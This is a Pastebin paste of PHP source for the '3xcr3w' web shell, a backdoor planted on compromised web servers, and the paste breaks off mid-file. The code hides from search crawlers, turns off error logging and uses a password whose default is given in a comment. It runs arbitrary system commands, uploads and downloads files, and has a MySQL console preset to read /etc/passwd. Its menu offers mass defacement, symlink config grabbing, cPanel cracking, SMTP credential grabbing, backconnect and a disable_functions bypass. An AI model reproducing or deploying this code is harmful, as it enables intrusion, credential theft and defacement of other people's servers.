buckethax0r

3xcr3w shell (mentahan)

Nov 21st, 2016
527
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 146.68 KB | None | 0 0
  1. <?php
  2. $auth_pass = "2ed348e96478fc3e4b88bcfb1882f684"; // default: 3xcr3w
  3. session_start();
  4. error_reporting(0);
  5. set_time_limit(0);
  6. @set_magic_quotes_runtime(0);
  7. @clearstatcache();
  8. @ini_set('error_log',NULL);
  9. @ini_set('log_errors',0);
  10. @ini_set('max_execution_time',0);
  11. @ini_set('output_buffering',0);
  12. @ini_set('display_errors', 0);
  13.  
  14. if(isset($_GET['cr0tz'])){
  15. $color = "#00ff00";
  16. $default_action = 'FilesMan';
  17. $default_use_ajax = true;
  18. $default_charset = 'UTF-8';
  19. if(!empty($_SERVER['HTTP_USER_AGENT'])) {
  20. $userAgents = array("Googlebot", "Slurp", "MSNBot", "PycURL", "facebookexternalhit", "ia_archiver", "crawler", "Yandex", "Rambler", "Yahoo! Slurp", "YahooSeeker", "bingbot");
  21. if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
  22. header('HTTP/1.0 404 Not Found');
  23. exit;
  24. }
  25. }
  26.  
  27. function login_shell() {
  28. ?>
  29. <html>
  30. <head>
  31. <title>Extreme Crew</title>
  32. <style type="text/css">
  33. html {
  34. background: #000000;
  35. color: green;
  36. }
  37. header {
  38. color: green;
  39. margin: 10px auto;
  40. }
  41. input[type=password] {
  42. width: 250px;
  43. height: 25px;
  44. color: red;
  45. background: #000000;
  46. border: 1px solid #ffffff;
  47. padding: 5px;
  48. margin-left: 20px;
  49. text-align: center;
  50. }
  51. </style>
  52. </head>
  53. <header>
  54. <center><img src="https://s18.postimg.org/vmu2rxl09/15271444_375944339409115_447459008_o.jpg" width="30%" height="30%"></img></center>
  55. </header>
  56. <form method="post">
  57. <center><input type="password" name="pass"><center>
  58. </form>
  59. <?php
  60. exit;
  61. }
  62. if(!isset($_SESSION[md5($_SERVER['HTTP_HOST'])]))
  63. if( empty($auth_pass) || ( isset($_POST['pass']) && (md5($_POST['pass']) == $auth_pass) ) )
  64. $_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
  65. else
  66. login_shell();
  67.  
  68. if(isset($_GET['file']) && ($_GET['file'] != '') && ($_GET['act'] == 'download')) {
  69. @ob_clean();
  70. $file = $_GET['file'];
  71. header('Content-Description: File Transfer');
  72. header('Content-Type: application/octet-stream');
  73. header('Content-Disposition: attachment; filename="'.basename($file).'"');
  74. header('Expires: 0');
  75. header('Cache-Control: must-revalidate');
  76. header('Pragma: public');
  77. header('Content-Length: ' . filesize($file));
  78. readfile($file);
  79. exit;
  80. }
  81. ?>
  82. <html>
  83. <head>
  84. <title>Extreme Crew</title>
  85. <meta name='author' content='Extreme Crew'>
  86. <meta charset="UTF-8">
  87. <style type='text/css'>
  88. html {
  89. background: #000000;
  90. font-family: 'Ubuntu';
  91. font-size: 13px;
  92. width: 100%;
  93. }
  94. li {
  95. display: inline;
  96. }
  97. table, th, td {
  98. border-collapse:collapse;
  99. font-family: Tahoma, Geneva, sans-serif;
  100. background: transparent;
  101. }
  102. .table_home, .th_home, .td_home {
  103. border: 1px solid #00FFFF;
  104. }
  105. th {
  106. padding: 10px;
  107. }
  108. a {
  109. color: #00FFFF;
  110. text-decoration: none;
  111. }
  112. a:hover {
  113. color: #00FFFF;
  114. text-shadow: 0pt 1pt 0.1em rgb(255, 255, 255);
  115. text-decoration:none;
  116. }
  117. b {
  118. color: #00FFFF;
  119. }
  120. input[type=text], input[type=password],input[type=submit] {
  121. background: transparent;
  122. color: #00FFFF;
  123. border: 1px solid #00FFFF;
  124. margin: 5px auto;
  125. padding-left: 5px;
  126. font-family: 'Ubuntu';
  127. font-size: 13px;
  128. }
  129. textarea {
  130. border: 1px solid #00FFFF;
  131. width: 100%;
  132. height: 400px;
  133. padding-left: 5px;
  134. margin: 10px auto;
  135. resize: none;
  136. background: transparent;
  137. color: #00FFFF;
  138. font-family: 'Ubuntu';
  139. font-size: 13px;
  140. }
  141. select {
  142. width: 152px;
  143. background: #000000;
  144. color: lime;
  145. border: 1px solid #00FFFF;
  146. margin: 5px auto;
  147. padding-left: 5px;
  148. font-family: 'Ubuntu';
  149. font-size: 13px;
  150. }
  151. option:hover {
  152. background: lime;
  153. color: #000000;
  154. }
  155. *{
  156. text-shadow: 0pt 0pt 0.3em rgb(153, 153, 153);
  157. font-size:11px;
  158. font-family:Tahoma,Verdana,Arial;
  159. color:#00FFFF;
  160. }
  161. .mybox{-moz-border-radius: 10px; border-radius: 10px;border:1px solid #00FFFF; padding:4px 2px;width:70%;line-height:24px;background:none;box-shadow: 0px 4px 2px white;-webkit-box-shadow: 0px 4px 2px #00FFFF;-moz-box-shadow: 0px 4px 2px #00FFFF;}
  162. .cgx2 {text-align: center;letter-spacing:1px;font-family: "orbitron";color: #00FFFF;font-size:25px;text-shadow: 5px 5px 5px black;}
  163. .infoweb {
  164. border-right: 1px solid #00FFFF;
  165. }
  166. a:hover{
  167. text-decoration:none;
  168. }
  169. div #menu li:hover {cursor:pointer;
  170. }
  171. div#menu ul {
  172. margin:1px 1px 1px 1px;padding:0;float:left;
  173. }
  174. div#menu li {
  175. position:relative;display:block;float:left;
  176. }
  177. div#menu li:hover>ul {
  178. left:0px;
  179. }
  180. div#menu a{
  181. margin:1px 1px 1px 1px;padding:0;float:left;-moz-border-radius: 6px; border-radius: 12px; border:1px solid #00FFFF;display:block;float:left;padding:4px 6px;margin:0 6px 0 0;text-decoration:none;letter-spacing:3px;color:#00FFFF;
  182. }
  183. div#menu a:hover{
  184. text-shadow: 0pt 1pt 0.1em rgb(255, 255, 255);
  185. text-decoration:none;
  186. }
  187. div#menu ul ul {
  188. margin:2px 1px 1px 1px;float:left;position:absolute;top:20px;left:-990em;width:140px;padding:5px 0 5px 0;background:none;
  189. }
  190. div#menu ul ul a {
  191. margin-top:1px;padding:1px 1px 1px 1px;height:20px;float:none;display:block;color:#00FFFF;
  192. }
  193. .output {
  194. margin:auto;border:2px solid #00FFFF;width:100%;height:400px;background:none;padding:0 2px;
  195. }
  196. .cmdbox {
  197. width:100%;
  198. }
  199. </style>
  200. </head>
  201. <?php
  202.  
  203. function w($dir,$perm) {
  204. if(!is_writable($dir)) {
  205. return "<font color=red>".$perm."</font>";
  206. } else {
  207. return "<font color=lime>".$perm."</font>";
  208. }
  209. }
  210. function r($dir,$perm) {
  211. if(!is_readable($dir)) {
  212. return "<font color=red>".$perm."</font>";
  213. } else {
  214. return "<font color=lime>".$perm."</font>";
  215. }
  216. }
  217. function exe($cmd) {
  218. if(function_exists('system')) {
  219. @ob_start();
  220. @system($cmd);
  221. $buff = @ob_get_contents();
  222. @ob_end_clean();
  223. return $buff;
  224. } elseif(function_exists('exec')) {
  225. @exec($cmd,$results);
  226. $buff = "";
  227. foreach($results as $result) {
  228. $buff .= $result;
  229. } return $buff;
  230. } elseif(function_exists('passthru')) {
  231. @ob_start();
  232. @passthru($cmd);
  233. $buff = @ob_get_contents();
  234. @ob_end_clean();
  235. return $buff;
  236. } elseif(function_exists('shell_exec')) {
  237. $buff = @shell_exec($cmd);
  238. return $buff;
  239. }
  240. }
  241. function perms($file){
  242. $perms = fileperms($file);
  243. if (($perms & 0xC000) == 0xC000) {
  244. // Socket
  245. $info = 's';
  246. } elseif (($perms & 0xA000) == 0xA000) {
  247. // Symbolic Link
  248. $info = 'l';
  249. } elseif (($perms & 0x8000) == 0x8000) {
  250. // Regular
  251. $info = '-';
  252. } elseif (($perms & 0x6000) == 0x6000) {
  253. // Block special
  254. $info = 'b';
  255. } elseif (($perms & 0x4000) == 0x4000) {
  256. // Directory
  257. $info = 'd';
  258. } elseif (($perms & 0x2000) == 0x2000) {
  259. // Character special
  260. $info = 'c';
  261. } elseif (($perms & 0x1000) == 0x1000) {
  262. // FIFO pipe
  263. $info = 'p';
  264. } else {
  265. // Unknown
  266. $info = 'u';
  267. }
  268. // Owner
  269. $info .= (($perms & 0x0100) ? 'r' : '-');
  270. $info .= (($perms & 0x0080) ? 'w' : '-');
  271. $info .= (($perms & 0x0040) ?
  272. (($perms & 0x0800) ? 's' : 'x' ) :
  273. (($perms & 0x0800) ? 'S' : '-'));
  274. // Group
  275. $info .= (($perms & 0x0020) ? 'r' : '-');
  276. $info .= (($perms & 0x0010) ? 'w' : '-');
  277. $info .= (($perms & 0x0008) ?
  278. (($perms & 0x0400) ? 's' : 'x' ) :
  279. (($perms & 0x0400) ? 'S' : '-'));
  280. // World
  281. $info .= (($perms & 0x0004) ? 'r' : '-');
  282. $info .= (($perms & 0x0002) ? 'w' : '-');
  283. $info .= (($perms & 0x0001) ?
  284. (($perms & 0x0200) ? 't' : 'x' ) :
  285. (($perms & 0x0200) ? 'T' : '-'));
  286. return $info;
  287. }
  288. function hdd($s) {
  289. if($s >= 1073741824)
  290. return sprintf('%1.2f',$s / 1073741824 ).' GB';
  291. elseif($s >= 1048576)
  292. return sprintf('%1.2f',$s / 1048576 ) .' MB';
  293. elseif($s >= 1024)
  294. return sprintf('%1.2f',$s / 1024 ) .' KB';
  295. else
  296. return $s .' B';
  297. }
  298. function ambilKata($param, $kata1, $kata2){
  299. if(strpos($param, $kata1) === FALSE) return FALSE;
  300. if(strpos($param, $kata2) === FALSE) return FALSE;
  301. $start = strpos($param, $kata1) + strlen($kata1);
  302. $end = strpos($param, $kata2, $start);
  303. $return = substr($param, $start, $end - $start);
  304. return $return;
  305. }
  306. function getsource($url) {
  307. $curl = curl_init($url);
  308. curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
  309. curl_setopt($curl, CURLOPT_FOLLOWLOCATION, true);
  310. curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false);
  311. curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, false);
  312. $content = curl_exec($curl);
  313. curl_close($curl);
  314. return $content;
  315. }
  316. function bing($dork) {
  317. $npage = 1;
  318. $npages = 30000;
  319. $allLinks = array();
  320. $lll = array();
  321. while($npage <= $npages) {
  322. $x = getsource("http://www.bing.com/search?q=".$dork."&first=".$npage);
  323. if($x) {
  324. preg_match_all('#<h2><a href="(.*?)" h="ID#', $x, $findlink);
  325. foreach ($findlink[1] as $fl) array_push($allLinks, $fl);
  326. $npage = $npage + 10;
  327. if (preg_match("(first=" . $npage . "&amp)siU", $x, $linksuiv) == 0) break;
  328. } else break;
  329. }
  330. $URLs = array();
  331. foreach($allLinks as $url){
  332. $exp = explode("/", $url);
  333. $URLs[] = $exp[2];
  334. }
  335. $array = array_filter($URLs);
  336. $array = array_unique($array);
  337. $sss = count(array_unique($array));
  338. foreach($array as $domain) {
  339. echo $domain."\n";
  340. }
  341. }
  342. function reverse($url) {
  343. $ch = curl_init("http://domains.yougetsignal.com/domains.php");
  344. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1 );
  345. curl_setopt($ch, CURLOPT_POSTFIELDS, "remoteAddress=$url&ket=");
  346. curl_setopt($ch, CURLOPT_HEADER, 0);
  347. curl_setopt($ch, CURLOPT_POST, 1);
  348. $resp = curl_exec($ch);
  349. $resp = str_replace("[","", str_replace("]","", str_replace("\"\"","", str_replace(", ,",",", str_replace("{","", str_replace("{","", str_replace("}","", str_replace(", ",",", str_replace(", ",",", str_replace("'","", str_replace("'","", str_replace(":",",", str_replace('"','', $resp ) ) ) ) ) ) ) ) ) ))));
  350. $array = explode(",,", $resp);
  351. unset($array[0]);
  352. foreach($array as $lnk) {
  353. $lnk = "http://$lnk";
  354. $lnk = str_replace(",", "", $lnk);
  355. echo $lnk."\n";
  356. ob_flush();
  357. flush();
  358. }
  359. curl_close($ch);
  360. }
  361. if(get_magic_quotes_gpc()) {
  362. function ec_ss($array) {
  363. return is_array($array) ? array_map('ec_ss', $array) : stripslashes($array);
  364. }
  365. $_POST = ec_ss($_POST);
  366. $_COOKIE = ec_ss($_COOKIE);
  367. }
  368.  
  369. if(isset($_GET['folder'])) {
  370. $dir = $_GET['folder'];
  371. chdir($dir);
  372. } else {
  373. $dir = getcwd();
  374. }
  375. $kernel = php_uname();
  376. $ip = gethostbyname($_SERVER['HTTP_HOST']);
  377. $dir = str_replace("\\","/",$dir);
  378. $scdir = explode("/", $dir);
  379. $freespace = hdd(disk_free_space("/"));
  380. $total = hdd(disk_total_space("/"));
  381. $used = $total - $freespace;
  382. $sm = (@ini_get(strtolower("safe_mode")) == 'on') ? "<font style='color:lime'>ON</font>" : "<font style='color:red'>OFF</font>";
  383. $ds = @ini_get("disable_functions");
  384. $mysql = (function_exists('mysql_connect')) ? "<font style='color:lime'>ON</font>" : "<font style='color:red'>OFF</font>";
  385. $curl = (function_exists('curl_version')) ? "<font style='color:lime'>ON</font>" : "<font style='color:red'>OFF</font>";
  386. $wget = (exe('wget --help')) ? "<font style='color:lime'>ON</font>" : "<font style='color:red'>OFF</font>";
  387. $perl = (exe('perl --help')) ? "<font style='color:lime'>ON</font>" : "<font style='color:red'>OFF</font>";
  388. $python = (exe('python --help')) ? "<font style='color:lime'>ON</font>" : "<font style='color:red'>OFF</font>";
  389. $show_ds = (!empty($ds)) ? "<font style='color:red'>$ds</font>" : "<font style='color:lime'>ON</font>";
  390. if(!function_exists('posix_getegid')) {
  391. $user = @get_current_user();
  392. $uid = @getmyuid();
  393. $gid = @getmygid();
  394. $group = "?";
  395. } else {
  396. $uid = @posix_getpwuid(posix_geteuid());
  397. $gid = @posix_getgrgid(posix_getegid());
  398. $user = $uid['name'];
  399. $uid = $uid['uid'];
  400. $group = $gid['name'];
  401. $gid = $gid['gid'];
  402. }
  403. echo "<table>";
  404. echo "<td class=infoweb>";
  405. echo "System: <font color=lime>".$kernel."</font><br>";
  406. echo "User: <font color=lime>".$user."</font> (".$uid.") Group: <font color=lime>".$group."</font> (".$gid.")<br>";
  407. echo "HDD: <font color=lime>$used</font> / <font color=lime>$total</font> ( Free: <font color=lime>$freespace</font> )<br>";
  408. echo "Safe Mode: $sm<br>";
  409. echo "Disable Functions: $show_ds<br>";
  410. echo "MySQL: $mysql | Perl: $perl | Python: $python | WGET: $wget | CURL: $curl <br>";
  411. echo "Current DIR: ";
  412. foreach($scdir as $c_dir => $cdir) {
  413. echo "<a href='?cr0tz&folder=";
  414. for($i = 0; $i <= $c_dir; $i++) {
  415. echo $scdir[$i];
  416. if($i != $c_dir) {
  417. echo "/";
  418. }
  419. }
  420. echo "'>$cdir</a>/";
  421. }
  422. echo "&nbsp;&nbsp;[ ".w($dir, perms($dir))." ]";
  423. echo "</td><td style='width:15%'>";
  424. echo "&nbsp;Server IP: <font color=lime>".$ip."</font><br>&nbsp;Your IP: <font color=lime>".$_SERVER['REMOTE_ADDR']."</font>";
  425. echo "<br><br>";
  426. echo "&nbsp;<a href='?cr0tz' style='border:1px solid #00FFFF;width:80px;padding:0px 8px 0px 8px;'>H O M E</a>&nbsp;<a href='?cr0tz&do=kill' style='border:1px solid #00FFFF;width:80px;padding:0px 8px 0px 8px;'>K I L L </a>&nbsp;<a href='?cr0tz&logout=true' style='color:red;border:1px solid #00FFFF;width:80px;padding:0px 8px 0px 8px;'>L O G O U T</a>";
  427. echo "</td></table>";
  428. echo "<hr>";
  429. echo "
  430. <table>
  431. <tr>
  432. <div id='menu'>
  433. <ul class=menu>
  434. <li><a href='?cr0tz&folder=$dir'>Filesman</a></li>
  435. <li><a href='?cr0tz&folder=$dir&do=cmd'>Command</a></li>
  436. <li><a href='?cr0tz&folder=$dir&do=jumping'>Jumper</a></li>
  437. <li><a>Symlink</a>
  438. <ul>
  439. <li><a href='?cr0tz&folder=$dir&do=config' style='background-color:black'>&nbsp;Config</a></li>
  440. <li><a href='?cr0tz&folder=$dir&do=convh' style='background-color:black'>&nbsp;Config vhosts</a></li>
  441. <li><a href='?cr0tz&folder=$dir&do=symser' style='background-color:black'>&nbsp;Symlink Server</a></li>
  442. </ul>
  443. </li>
  444. <li><a>Mass</a>
  445. <ul>
  446. <li><a href='?cr0tz&folder=$dir&do=mass_deface' style='background:black'>&nbsp;Mass Deface</a></li>
  447. <li><a href='?cr0tz&folder=$dir&do=mass_helper' style='background:black'>&nbsp;Mass Helper</a></li>
  448. </ul>
  449. </li>
  450. <li><a href='?cr0tz&folder=$dir&do=domains'>Domains</a></li>
  451. <li><a href='?cr0tz&folder=$dir&do=upload'>Uploader</a></li>
  452. <li><a>Tools</a>
  453. <ul>
  454. <li><a href='?cr0tz&folder=$dir&do=zoneh' style='background-color:black'>&nbsp;Zone-H</a></li>
  455. <li><a href='?cr0tz&folder=$dir&do=network' style='background-color:black'>&nbsp;Backconnect</a></li>
  456. <li><a href='?cr0tz&folder=$dir&do=mysql' style='background-color:black'>&nbsp;Mysql Interface</a></li>
  457. <li><a href='?cr0tz&folder=$dir&do=adminer' style='background-color:black'>&nbsp;Adminer</a></li>
  458. </ul>
  459. </li>
  460. <li><a>Grab/Crack</a>
  461. <ul>
  462. <li><a href='?cr0tz&folder=$dir&do=cpanel' style='background-color:black'>&nbsp;Cpanel Cracker</a></li>
  463. <li><a href='?cr0tz&folder=$dir&do=smtp' style='background-color:black'>&nbsp;SMTP Grabber</a></li>
  464. </ul>
  465. </li>
  466. <li><a>Bypass</a>
  467. <ul>
  468. <li><a href='?cr0tz&folder=$dir&do=etcpler' style='background-color:black'>&nbsp;etc/passw</a></li>
  469. <li><a href='?cr0tz&folder=$dir&do=bypass' style='background-color:black'>&nbsp;Disable&nbsp;Functions</a></li>
  470. </ul>
  471. </li>
  472. <li><a href='?cr0tz&folder=$dir&do=boom'>Ngindex</a></li>
  473. </ul>
  474. </div></tr><br><br>";
  475. echo "<hr>";
  476. echo "</table>";
  477. if($_GET['logout'] == true) {
  478. unset($_SESSION[md5($_SERVER['HTTP_HOST'])]);
  479. echo "<script>window.location='?';</script>";
  480. } elseif($_GET['do'] == 'upload') {
  481. echo "<center>";
  482. if($_POST['upload']) {
  483. if($_POST['tipe_upload'] == 'biasa') {
  484. if(@copy($_FILES['ix_file']['tmp_name'], "$dir/".$_FILES['ix_file']['name']."")) {
  485. $act = "<br><font color=lime>Uploaded!</font> at <i><b>$dir/".$_FILES['ix_file']['name']."</b></i>";
  486. } else {
  487. $act = "<font color=red>failed to upload file</font>";
  488. }
  489. } else {
  490. $root = $_SERVER['DOCUMENT_ROOT']."/".$_FILES['ix_file']['name'];
  491. $web = $_SERVER['HTTP_HOST']."/".$_FILES['ix_file']['name'];
  492. if(is_writable($_SERVER['DOCUMENT_ROOT'])) {
  493. if(@copy($_FILES['ix_file']['tmp_name'], $root)) {
  494. $act = "<br><font color=lime>Uploaded!</font> at <i><b>$root -> </b></i><a href='http://$web' target='_blank'>$web</a>";
  495. } else {
  496. $act = "<font color=red>failed to upload file</font>";
  497. }
  498. } else {
  499. $act = "<font color=red>failed to upload file</font>";
  500. }
  501. }
  502. }
  503. echo "Upload File:
  504. <form method='post' enctype='multipart/form-data'>
  505. <input type='radio' name='tipe_upload' value='biasa' checked>Biasa [ ".w($dir,"Writeable")." ]
  506. <input type='radio' name='tipe_upload' value='home_root'>home_root [ ".w($_SERVER['DOCUMENT_ROOT'],"Writeable")." ]<br>
  507. <input type='file' name='ix_file'>
  508. <input type='submit' value='upload' name='upload'>
  509. </form>";
  510. echo $act;
  511. echo "</center>";
  512. } elseif($_GET['do'] == 'kill') {
  513. if(@unlink(preg_replace('!\(\d+\)\s.*!', '', __FILE__)))
  514. die('<center><br><center><h2>Shell removed</h2><br>Goodbye , Thanks for take my shell today</center></center>');
  515. else
  516. echo '<center>unlink failed!</center>';
  517. } elseif($_GET['do'] == 'mysql'){if(isset($_GET['sqlhost']) && isset($_GET['sqluser']) && isset($_GET['sqlpass']) && isset($_GET['sqlport'])){$sqlhost = $_GET['sqlhost'];$sqluser = $_GET['sqluser'];$sqlpass = $_GET['sqlpass'];$sqlport = $_GET['sqlport'];if($con = @mysql_connect($sqlhost.":".$sqlport,$sqluser,$sqlpass)){$msg .= "<div style='width:99%;padding:4px 10px 0 10px;'>";$msg .= "<p>Connected to ".$sqluser."<span class='gaya'>@</span>".$sqlhost.":".$sqlport;$msg .= "&nbsp;&nbsp;<span class='gaya'>-&gt;</span>&nbsp;&nbsp;<a href='?cr0tz&folder=".$dir."&amp;do=mysql&amp;sqlhost=".$sqlhost."&amp;sqluser=".$sqluser."&amp;sqlpass=".$sqlpass."&amp;sqlport=".$sqlport."&amp;'>[ databases ]</a>";if(isset($_GET['db'])) $msg .= "&nbsp;&nbsp;<span class='gaya'>-&gt;</span>&nbsp;&nbsp;<a href='?cr0tz&folder=".$dir."&amp;do=mysql&amp;sqlhost=".$sqlhost."&amp;sqluser=".$sqluser."&amp;sqlpass=".$sqlpass."&amp;sqlport=".$sqlport."&amp;db=".$_GET['db']."'>".htmlspecialchars($_GET['db'])."</a>";if(isset($_GET['table'])) $msg .= "&nbsp;&nbsp;<span class='gaya'>-&gt;</span>&nbsp;&nbsp;<a href='?cr0tz&folder=".$dir."&amp;do=mysql&amp;sqlhost=".$sqlhost."&amp;sqluser=".$sqluser."&amp;sqlpass=".$sqlpass."&amp;sqlport=".$sqlport."&amp;db=".$_GET['db']."&amp;table=".$_GET['table']."'>".htmlspecialchars($_GET['table'])."</a>";$msg .= "</p><p>version : ".mysql_get_server_info($con)." proto ".mysql_get_proto_info($con)."</p>";$msg .= "</div>";echo $msg;if(isset($_GET['db']) && (!isset($_GET['table'])) && (!isset($_GET['sqlquery']))){$db = $_GET['db'];$query = "DROP TABLE IF EXISTS b374k_table;\nCREATE TABLE `b374k_table` ( `file` LONGBLOB NOT NULL );\nLOAD DATA INFILE '/etc/passwd'\nINTO TABLE b374k_table;SELECT * FROM b374k_table;\nDROP TABLE IF EXISTS b374k_table;";$msg = "<div style='width:99%;padding:0 10px;'><form action='?' method='get'><input type='hidden' name='y' value='".$dir."' /> <input type='hidden' name='x' value='mysql' /> <input type='hidden' name='sqlhost' value='".$sqlhost."' /> <input type='hidden' name='sqluser' value='".$sqluser."' /> <input type='hidden' name='sqlport' value='".$sqlport."' /> <input type='hidden' name='sqlpass' value='".$sqlpass."' /> <input type='hidden' name='db' value='".$db."' /> <p><textarea name='sqlquery' class='output' style='width:98%;height:80px;'>$query</textarea></p> <p><input class='inputzbut' style='width:80px;' name='submitquery' type='submit' value='Go !' /></p> </form></div> ";$tables = array();$msg .= "<table class='explore' style='width:99%;'><tr><th>available tables on ".$db."</th></tr>";$hasil = @mysql_list_tables($db,$con);
  518. while(list($table) = @mysql_fetch_row($hasil)){@array_push($tables,$table);} @sort($tables);
  519. foreach($tables as $table){$msg .= "<tr><td><a href='?cr0tz&folder=".$dir."&amp;do=mysql&amp;sqlhost=".$sqlhost."&amp;sqluser=".$sqluser."&amp;sqlpass=".$sqlpass."&amp;sqlport=".$sqlport."&amp;db=".$db."&amp;table=".$table."'>$table</a></td></tr>";} $msg .= "</table>";}
  520. elseif(isset($_GET['table']) && (!isset($_GET['sqlquery']))){
  521. $db = $_GET['db'];$table = $_GET['table'];$query = "SELECT * FROM ".$db.".".$table." LIMIT 0,100;";$msgq = "<div style='width:99%;padding:0 10px;'><form action='?' method='get'> <input type='hidden' name='y' value='".$dir."' /> <input type='hidden' name='x' value='mysql' /> <input type='hidden' name='sqlhost' value='".$sqlhost."' /> <input type='hidden' name='sqluser' value='".$sqluser."' /> <input type='hidden' name='sqlport' value='".$sqlport."' /> <input type='hidden' name='sqlpass' value='".$sqlpass."' /> <input type='hidden' name='db' value='".$db."' /> <input type='hidden' name='table' value='".$table."' /> <p><textarea name='sqlquery' class='output' style='width:98%;height:80px;'>".$query."</textarea></p> <p><input class='inputzbut' style='width:80px;' name='submitquery' type='submit' value='Go !' /></p> </form></div> ";$columns = array();$msg = "<table class='explore' style='width:99%;'>";$hasil = @mysql_query("SHOW FIELDS FROM ".$db.".".$table);while(list($column) = @mysql_fetch_row($hasil)){$msg .= "<th>$column</th>";$kolum = $column;}$msg .= "</tr>";$hasil = @mysql_query("SELECT count(*) FROM ".$db.".".$table);
  522. list($total) = mysql_fetch_row($hasil);
  523. if(isset($_GET['z'])) $page = (int) $_GET['z'];
  524. else $page = 1;$pagenum = 100;$totpage = ceil($total / $pagenum);$start = (($page - 1) * $pagenum);$hasil = @mysql_query("SELECT * FROM ".$db.".".$table." LIMIT ".$start.",".$pagenum);
  525. while($datas = @mysql_fetch_assoc($hasil)){$msg .= "<tr>";foreach($datas as $data){if(trim($data) == "")
  526. $data = "&nbsp;";$msg .= "<td>$data</td>";}$msg .= "</tr>";} $msg .= "</table>";$head = "<div style='padding:10px 0 0 6px;'> <form action='?' method='get'> <input type='hidden' name='y' value='".$dir."' /> <input type='hidden' name='x' value='mysql' /> <input type='hidden' name='sqlhost' value='".$sqlhost."' /> <input type='hidden' name='sqluser' value='".$sqluser."' /> <input type='hidden' name='sqlport' value='".$sqlport."' /> <input type='hidden' name='sqlpass' value='".$sqlpass."' /> <input type='hidden' name='db' value='".$db."' /> <input type='hidden' name='table' value='".$table."' /> Page <select class='inputz' name='z' onchange='this.form.submit();'>";
  527. for($i = 1;$i <= $totpage;$i++){$head .= "<option value='".$i."'>".$i."</option>";
  528. if($i == $_GET['z']) $head .= "<option value='".$i."' selected='selected'>".$i."</option>";} $head .= "</select><noscript><input class='inputzbut' type='submit' value='Go !' /></noscript></form></div>";$msg = $msgq.$head.$msg;}
  529. elseif(isset($_GET['submitquery']) && ($_GET['sqlquery'] != "")){$db = $_GET['db'];$query = magicboom($_GET['sqlquery']);
  530. $msg = "<div style='width:99%;padding:0 10px;'><form action='?' method='get'> <input type='hidden' name='y' value='".$dir."' /> <input type='hidden' name='x' value='mysql' /> <input type='hidden' name='sqlhost' value='".$sqlhost."' /> <input type='hidden' name='sqluser' value='".$sqluser."' /> <input type='hidden' name='sqlport' value='".$sqlport."' /> <input type='hidden' name='sqlpass' value='".$sqlpass."' /> <input type='hidden' name='db' value='".$db."' /> <p><textarea name='sqlquery' class='output' style='width:98%;height:80px;'>".$query."</textarea></p> <p><input class='inputzbut' style='width:80px;' name='submitquery' type='submit' value='Go !' /></p> </form></div> ";@mysql_select_db($db);$querys = explode(";",$query);foreach($querys as $query){if(trim($query) != ""){$hasil = mysql_query($query);
  531. if($hasil){$msg .= "<p style='padding:0;margin:20px 6px 0 6px;'>".$query.";&nbsp;&nbsp;&nbsp;<span class='gaya'>[</span> ok <span class='gaya'>]</span></p>";$msg .= "<table class='explore' style='width:99%;'><tr>";
  532. for($i=0;$i<@mysql_num_fields($hasil);$i++) $msg .= "<th>".htmlspecialchars(@mysql_field_name($hasil,$i))."</th>";$msg .= "</tr>";for($i=0;$i<@mysql_num_rows($hasil);$i++) {$rows=@mysql_fetch_array($hasil);$msg .= "<tr>";for($j=0;$j<@mysql_num_fields($hasil);$j++) {
  533. if($rows[$j] == "") $dataz = "&nbsp;";
  534. else $dataz = $rows[$j];$msg .= "<td>".$dataz."</td>";} $msg .= "</tr>";} $msg .= "</table>";}
  535. else $msg .= "<p style='padding:0;margin:20px 6px 0 6px;'>".$query.";&nbsp;&nbsp;&nbsp;<span class='gaya'>[</span> error <span class='gaya'>]</span></p>";} } }
  536. else {$query = "SHOW PROCESSLIST;\nSHOW VARIABLES;\nSHOW STATUS;";$msg = "<div style='width:99%;padding:0 10px;'><form action='?' method='get'> <input type='hidden' name='y' value='".$dir."' /><input type='hidden' name='x' value='mysql' /><input type='hidden' name='sqlhost' value='".$sqlhost."' /><input type='hidden' name='sqluser' value='".$sqluser."' /><input type='hidden' name='sqlport' value='".$sqlport."' /><input type='hidden' name='sqlpass' value='".$sqlpass."' /><input type='hidden' name='db' value='".$db."' /><p><textarea name='sqlquery' class='output' style='width:98%;height:80px;'>".$query."</textarea></p><p><input class='inputzbut' style='width:80px;' name='submitquery' type='submit' value='Go !' /></p></form></div> ";$dbs = array();$msg .= "<table class='explore' style='width:99%;'><tr><th>available databases</th></tr>";$hasil = @mysql_list_dbs($con);
  537. while(list($db) = @mysql_fetch_row($hasil)){@array_push($dbs,$db);} @sort($dbs);foreach($dbs as $db){
  538. $msg .= "<tr><td><a href='?cr0tz&folder=".$dir."&amp;do=mysql&amp;sqlhost=".$sqlhost."&amp;sqluser=".$sqluser."&amp;sqlpass=".$sqlpass."&amp;sqlport=".$sqlport."&amp;db=".$db."'>$db</a></td></tr>";} $msg .= "</table>";}
  539. @mysql_close($con);} else $msg = "<p style='text-align:center;'>can't connect</p>";echo $msg;} else{?>
  540. <br><center><h2 class="cgx2">MySQL Connect</h2><form action="?" method="get"><input type="hidden" name="y" value="<?php echo $dir;?>" /> <input type="hidden" name="x" value="mysql" /><table class="tabnet" style="width:300px;" align="center"> <tr><th colspan="2">Connection Form</th></tr> <tr><td>&nbsp;&nbsp;Host</td><td><input style="width:220px;" class="inputz" type="text" name="sqlhost" value="localhost" /></td></tr> <tr><td>&nbsp;&nbsp;Username</td><td><input style="width:220px;" class="inputz" type="text" name="sqluser" value="root" /></td></tr> <tr><td>&nbsp;&nbsp;Password</td><td><input style="width:220px;" class="inputz" type="text" name="sqlpass" value="password" /></td></tr> <tr><td>&nbsp;&nbsp;Port</td><td><input style="width:80px;" class="inputz" type="text" name="sqlport" value="3306" />&nbsp;<input style="width:19%;" class="inputzbut" type="submit" value="Go !" name="submitsql" /></td></tr></table></form></center>
  541. <?php }}
  542. elseif($_GET['do'] == 'cmd') {?>
  543. <form action="?cr0tz&act=<?php echo $dir;?>&amp;do=cmd" method="post"> <table class="cmdbox"> <tr><td colspan="2">
  544. <textarea class="output" readonly>
  545. <?php if(isset($_POST['submitcmd'])) {echo @exe($_POST['cmd']);} ?>
